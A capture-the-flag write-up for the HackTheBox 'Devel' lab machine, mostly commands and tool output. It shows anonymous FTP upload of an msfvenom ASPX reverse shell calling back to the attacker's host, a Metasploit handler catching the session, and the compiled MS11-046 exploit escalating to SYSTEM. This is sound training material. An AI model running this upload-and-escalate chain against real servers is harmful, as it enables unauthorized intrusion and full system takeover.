HackTheBox: Devel

I first started by running Nmap against the machine.

# Nmap 7.80 scan initiated Tue Sep 15 15:54:13 2020 as: nmap -sV -sC -O -oN scan -p- 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.023s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 09-19-20  03:04AM                 2864 shell1.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 15 15:56:25 2020 -- 1 IP address (1 host up) scanned in 132.34 seconds

From this output we can see that FTP and HTTP are both running, with HTTP being served by IIS 7.5. We can also see that FTP allows guest logins.

I tried connecting to the FTP server and uploaded a txt file which worked successfully. I was also able to browse to this file via HTTP. As file uploads were possible I generated an ASPX reverse shell using msfvenom to upload to the machine.

msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=10.10.14.27 lport=2600 -f aspx -o now.aspx

I then uploaded the now.aspx file to the devel machine:

root@kali:/home/kali/Documents/devel# ftp 10.10.10.5                                                                                                                                                                                       
Connected to 10.10.10.5.                                                                                                                                                                                                                   
220 Microsoft FTP Service                                                                                                                                                                                                                  
Name (10.10.10.5:kali): anonymous                                                                                                                                                                                                          
331 Anonymous access allowed, send identity (e-mail name) as password.                                                                                                                                                                     
Password:                                                                                                                                                                                                                                  
230 User logged in.                                                                                                                                                                                                                        
Remote system type is Windows_NT.                                                                                                                                                                                                          
ftp> put now.aspx 
local: now.aspx remote: now.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2879 bytes sent in 0.00 secs (4.3860 MB/s)

Once the file uploaded. I started a handler on metasploit listening on port 2600 to capture the reverse shell created when now.aspx is executed.

msf5 exploit() > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.27
lhost => 10.10.14.27
msf5 exploit(multi/handler) > set lport 2600
lport => 2600
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.27:2600

I then opened the web browser and browsed to http://10.10.10.5/now.aspx to execute the reverse shell. The output to the handler confirmed this worked successfully.

[*] Started reverse TCP handler on 10.10.14.27:2600 
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 10 opened (10.10.14.27:2600 -> 10.10.10.5:49165) at 2020-09-19 14:05:12 -0400


meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > systeminfo
[-] Unknown command: systeminfo.
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > 

From this output we can see it’s a Windows 7 32bit machine. After some trial and error I was able to identify that it had no hotfixes installed, and so decided to use the MS11-046 exploit to escalate privileges. The exploit was downloaded from exploitdb and compiled into a file which can be run on the devel machine:

root@kali:/home/kali/Downloads# i686-w64-mingw32-gcc 40564.c -o testing.exe -lws2_32

I then uploaded this compiled testing.exe to the devel machine using the meterpreter shell:

meterpreter > upload /home/kali/Documents/devel/testing.exe
[*] uploading  : /home/kali/Documents/devel/testing.exe -> testing.exe
[*] Uploaded 291.76 KiB of 291.76 KiB (100.0%): /home/kali/Documents/devel/testing.exe -> testing.exe
[*] uploaded   : /home/kali/Documents/devel/testing.exe -> testing.exe
meterpreter > 

Once uploaded I migrated to a cmd shell and executed testing.exe:

meterpreter > shell
Process 1196 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\Users\Public>whoami    
whoami
iis apppool\web

c:\Users\Public>testing.exe
testing.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>

You can see from this output that it ran successfully an escalated the shell to a SYSTEM user. As a system user we are then able to read both the user and root flags.

c:\Windows\System32>cd /Users/babis/Desktop
cd /Users/babis/Desktop

c:\Users\babis\Desktop>more user.txt.txt
more user.txt.txt
[REDACTED]

c:\Users\babis\Desktop>cd /users/Administrator/Desktop
cd /users/Administrator/Desktop

c:\Users\Administrator\Desktop>more root.txt.txt
more root.txt.txt
[REDACTED]

c:\Users\Administrator\Desktop>

Leave a Reply

Your email address will not be published. Required fields are marked *